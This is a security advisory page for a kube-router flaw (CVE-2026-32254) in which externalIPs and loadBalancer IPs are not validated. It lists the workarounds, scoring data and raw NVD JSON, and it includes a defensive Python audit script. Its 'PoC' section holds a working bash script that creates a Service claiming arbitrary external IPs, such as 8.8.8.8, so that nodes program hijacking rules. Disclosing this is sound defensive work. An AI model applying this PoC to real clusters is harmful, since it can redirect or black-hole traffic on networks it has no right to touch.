Security Vulnerability Report
CVE-2026-32254 CVSS 7.1 HIGH

Published: 2026-03-18 04:17:24
Last Modified: 2026-03-19 18:06:52

Description

Kube-router is a turnkey solution for Kubernetes networking. Prior to version 2.8.0, Kube-router's proxy module does not validate externalIPs or loadBalancer IPs before programming them into the node's network configuration. Version 2.8.0 contains a patch for the issue. Available workarounds include enabling DenyServiceExternalIPs feature gate, deploying admission policy, restricting service creation RBAC, monitoring service changes, and applying BGP prefix filtering.
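The advisory's workarounds (admission policy, monitoring service changes) come down to one check: no Service may carry an externalIP or loadBalancer ingress IP that the operator has not explicitly allowed. The script below is an added example, not kube-router's own code or its 2.8.0 patch; it audits Service objects in the shape `kubectl get services -A -o json` produces and reports every IP outside a hypothetical allowlist (`ALLOWED_PREFIXES`, a constructed TEST-NET-3 range). The sample input is constructed.

```python
"""
Added example (not kube-router's code): audit Service objects for externalIPs
and loadBalancer ingress IPs that fall outside an operator-defined allowlist.
This is the detection-side counterpart of the advisory's admission-policy and
"monitor service changes" workarounds. Input shape follows
`kubectl get services -A -o json`.
"""
import ipaddress
import json

# Hypothetical allowlist: prefixes the operator actually intends to serve or
# announce over BGP. Constructed value (RFC 5737 TEST-NET-3).
ALLOWED_PREFIXES = [ipaddress.ip_network("203.0.113.0/24")]


def _ip_allowed(ip_str, allowed):
    """True only if ip_str parses and lies inside one of the allowed prefixes."""
    try:
        ip = ipaddress.ip_address(ip_str)
    except ValueError:
        return False  # malformed address: never allowed
    return any(ip in net for net in allowed)


def service_ips(svc):
    """Yield (field, ip) for every IP a Service asks the node proxy to program."""
    spec = svc.get("spec", {})
    for ip in spec.get("externalIPs") or []:
        yield "spec.externalIPs", ip
    ingress = svc.get("status", {}).get("loadBalancer", {}).get("ingress") or []
    for entry in ingress:
        if "ip" in entry:  # hostname-only ingress entries carry no IP to program
            yield "status.loadBalancer.ingress", entry["ip"]


def audit_services(service_list, allowed=ALLOWED_PREFIXES):
    """Return one finding dict per disallowed IP: namespace, name, field, ip."""
    findings = []
    for svc in service_list.get("items", []):
        meta = svc.get("metadata", {})
        for field, ip in service_ips(svc):
            if not _ip_allowed(ip, allowed):
                findings.append({
                    "namespace": meta.get("namespace", ""),
                    "name": meta.get("name", ""),
                    "field": field,
                    "ip": ip,
                })
    return findings


# Constructed sample in the shape of `kubectl get svc -A -o json`.
SAMPLE = {
    "items": [
        {
            "metadata": {"namespace": "default", "name": "web-ok"},
            "spec": {"type": "ClusterIP", "externalIPs": ["203.0.113.10"]},
        },
        {
            "metadata": {"namespace": "default", "name": "web-suspect"},
            "spec": {"type": "ClusterIP", "externalIPs": ["8.8.8.8", "203.0.113.11"]},
        },
        {
            "metadata": {"namespace": "prod", "name": "lb"},
            "spec": {"type": "LoadBalancer"},
            "status": {"loadBalancer": {"ingress": [{"ip": "10.0.0.1"},
                                                    {"hostname": "lb.example.test"}]}},
        },
    ]
}

if __name__ == "__main__":
    # Run against a real cluster with:
    #   kubectl get services -A -o json | python3 this_script.py
    # (replace SAMPLE with json.load(sys.stdin) in that case)
    for finding in audit_services(SAMPLE):
        print(json.dumps(finding))
```

Run as a periodic job or from an audit-log watcher, the findings list is what you alert on; the same allowlist rule, expressed as an admission policy, turns the detection into a block before the Service is persisted, which is the stronger of the advisory's two workarounds.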

CVSS Details

CVSS Score
7.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H

Configurations (Affected Products)

cpe:2.3:a:kube-router:kube-router:*:*:*:*:*:kubernetes:*:* - VULNERABLE
Kube-router < 2.8.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
bash
#!/bin/bash
# CVE-2026-32254 PoC - Kube-router External IPs Validation Bypass
# This PoC demonstrates creating a Service with arbitrary externalIPs
# Prerequisites: valid kubeconfig with permissions to create Services

export KUBECONFIG=${KUBECONFIG:-"/etc/kubernetes/admin.conf"}

# Create a malicious Service with arbitrary externalIP
cat <<EOF | kubectl apply -f -
apiVersion: v1
kind: Service
metadata:
  name: malicious-service
  namespace: default
spec:
  type: ClusterIP
  ports:
  - port: 80
    targetPort: 80
    protocol: TCP
  externalIPs:
  - 192.168.1.100
  - 10.0.0.1
  - 8.8.8.8
  selector:
    app: nginx
EOF

echo "[+] Malicious Service created"
echo "[+] Check iptables rules on nodes:"
echo "    kubectl get nodes -o wide"
echo "    ssh <node> iptables -L -n | grep 192.168.1.100"
echo "[+] Cleanup:"
echo "    kubectl delete service malicious-service"

References

https://github.com/cloudnativelabs/kube-router/commit/a1f0b2eea3ee0f66b9a5b5c49dcb714619ccd456 (Patch)
https://github.com/cloudnativelabs/kube-router/releases/tag/v2.8.0 (Product, Release Notes)
https://github.com/cloudnativelabs/kube-router/security/advisories/GHSA-phqm-jgc3-qf8g (Exploit, Mitigation, Patch, Vendor Advisory)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-32254", "sourceIdentifier": "[email protected]", "published": "2026-03-18T04:17:24.340", "lastModified": "2026-03-19T18:06:51.620", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Kube-router is a turnkey solution for Kubernetes networking. Prior to version 2.8.0, Kube-router's proxy module does not validate externalIPs or loadBalancer IPs before programming them into the node's network configuration. Version 2.8.0 contains a patch for the issue. Available workarounds include enabling DenyServiceExternalIPs feature gate, deploying admission policy, restricting service creation RBAC, monitoring service changes, and applying BGP prefix filtering."}, {"lang": "es", "value": "Kube-router es una solución llave en mano para redes de Kubernetes. Antes de la versión 2.8.0, el módulo proxy de Kube-router no valida las externalIPs o las IPs de loadBalancer antes de programarlas en la configuración de red del nodo. La versión 2.8.0 contiene un parche para el problema. Las soluciones alternativas disponibles incluyen habilitar la puerta de características DenyServiceExternalIPs, desplegar una política de admisión, restringir el RBAC de creación de servicios, monitorear los cambios de servicio y aplicar el filtrado de prefijos BGP."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:H", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "LOW", "availabilityImpact": "HIGH"}, "exploitabilityScore": 2.8, "impactScore": 4.2}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-284"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:kube-router:kube-router:*:*:*:*:*:kubernetes:*:*", "versionEndExcluding": "2.8.0", "matchCriteriaId": "C1324BAF-805F-49AF-9BAB-9218F73A9A2C"}]}]}], "references": [{"url": "https://github.com/cloudnativelabs/kube-router/commit/a1f0b2eea3ee0f66b9a5b5c49dcb714619ccd456", "source": "[email protected]", "tags": ["Patch"]}, {"url": "https://github.com/cloudnativelabs/kube-router/releases/tag/v2.8.0", "source": "[email protected]", "tags": ["Product", "Release Notes"]}, {"url": "https://github.com/cloudnativelabs/kube-router/security/advisories/GHSA-phqm-jgc3-qf8g", "source": "[email protected]", "tags": ["Exploit", "Mitigation", "Patch", "Vendor Advisory"]}, {"url": "https://github.com/cloudnativelabs/kube-router/security/advisories/GHSA-phqm-jgc3-qf8g", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0", "tags": ["Exploit", "Mitigation", "Patch", "Vendor Advisory"]}]}}